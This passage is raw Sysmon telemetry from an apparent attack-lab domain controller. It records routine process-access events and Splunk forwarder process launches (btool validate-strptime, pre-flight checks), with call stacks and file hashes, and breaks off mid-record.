10341000x80000000000000002221Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:24.117{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002220Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:24.117{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002219Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:24.117{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002218Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:24.117{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002217Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:24.117{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002216Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:24.117{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002215Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:24.117{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002214Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:24.117{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002213Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:24.117{10ACEC4A-853E-5FCF-0500-000000009101}6442448C:\Windows\system32\csrss.exe{10ACEC4A-8554-5FCF-5D00-000000009101}3000C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000002212Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:24.117{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002211Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:24.117{10ACEC4A-8554-5FCF-5C00-000000009101}27242192C:\Program Files\SplunkUniversalForwarder\bin\btool.exe{10ACEC4A-8554-5FCF-5D00-000000009101}3000C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+239c|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+2568|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+2926|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+11cf|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+1245|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+aa24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000002210Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:24.128{10ACEC4A-8554-5FCF-5D00-000000009101}3000C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe8.0.2splunkd servicesplunk ApplicationSplunk Inc.splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE" btool validate-strptime --log-warningsC:\Windows\system32\NT AUTHORITY\SYSTEM{10ACEC4A-853F-5FCF-E703-000000000000}0x3e70SystemMD5=B6D66AB97239BFB32F1CC9B8BFE1B4E0,SHA256=9D5EC3AA587B29840BE53E8E11B1C3BFE2FA3413DD65459325CBEEAFA66D3975,IMPHASH=CD69F86EE9B3C12390F5C7499BD3A589{10ACEC4A-8554-5FCF-5C00-000000009101}2724C:\Program Files\SplunkUniversalForwarder\bin\btool.exe"C:\Program Files\SplunkUniversalForwarder\bin\btool" validate-strptime --log-warnings 10341000x80000000000000002209Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:24.117{10ACEC4A-8552-5FCF-4100-000000009101}28042768C:\Windows\system32\conhost.exe{10ACEC4A-8554-5FCF-5C00-000000009101}2724C:\Program Files\SplunkUniversalForwarder\bin\btool.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002208Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:24.117{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002207Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:24.117{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002206Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:24.117{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002205Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:24.117{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002204Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:24.117{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002203Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:24.117{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002202Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:24.117{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002201Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:24.117{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002200Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:24.117{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002199Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:24.117{10ACEC4A-853E-5FCF-0500-000000009101}6441164C:\Windows\system32\csrss.exe{10ACEC4A-8554-5FCF-5C00-000000009101}2724C:\Program Files\SplunkUniversalForwarder\bin\btool.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000002198Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:24.117{10ACEC4A-8553-5FCF-5700-000000009101}40764072C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe{10ACEC4A-8554-5FCF-5C00-000000009101}2724C:\Program Files\SplunkUniversalForwarder\bin\btool.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+4022c|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+403f8|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+404c7|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+40fee|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+13671|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+18192|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+1adfc|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+4cf68|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000002197Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:24.123{10ACEC4A-8554-5FCF-5C00-000000009101}2724C:\Program Files\SplunkUniversalForwarder\bin\btool.exe8.0.2btoolsplunk ApplicationSplunk Inc.btool.exe"C:\Program Files\SplunkUniversalForwarder\bin\btool" validate-strptime --log-warningsC:\Windows\system32\NT AUTHORITY\SYSTEM{10ACEC4A-853F-5FCF-E703-000000000000}0x3e70SystemMD5=BC53EBF68CFA6E8A254D89ABEC89A65D,SHA256=97024B4A7182D9C253B1AC4E56A1C8F3BC8808B79E6D022EF27B95003622F0A4,IMPHASH=572E0CF4672412FA940B0E1835926B3B{10ACEC4A-8553-5FCF-5700-000000009101}4076C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe" _internal pre-flight-checks --answer-yes --no-prompt 10341000x80000000000000002196Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:24.070{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2B00-000000009101}2636C:\Windows\System32\spoolsv.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+6668|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002195Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 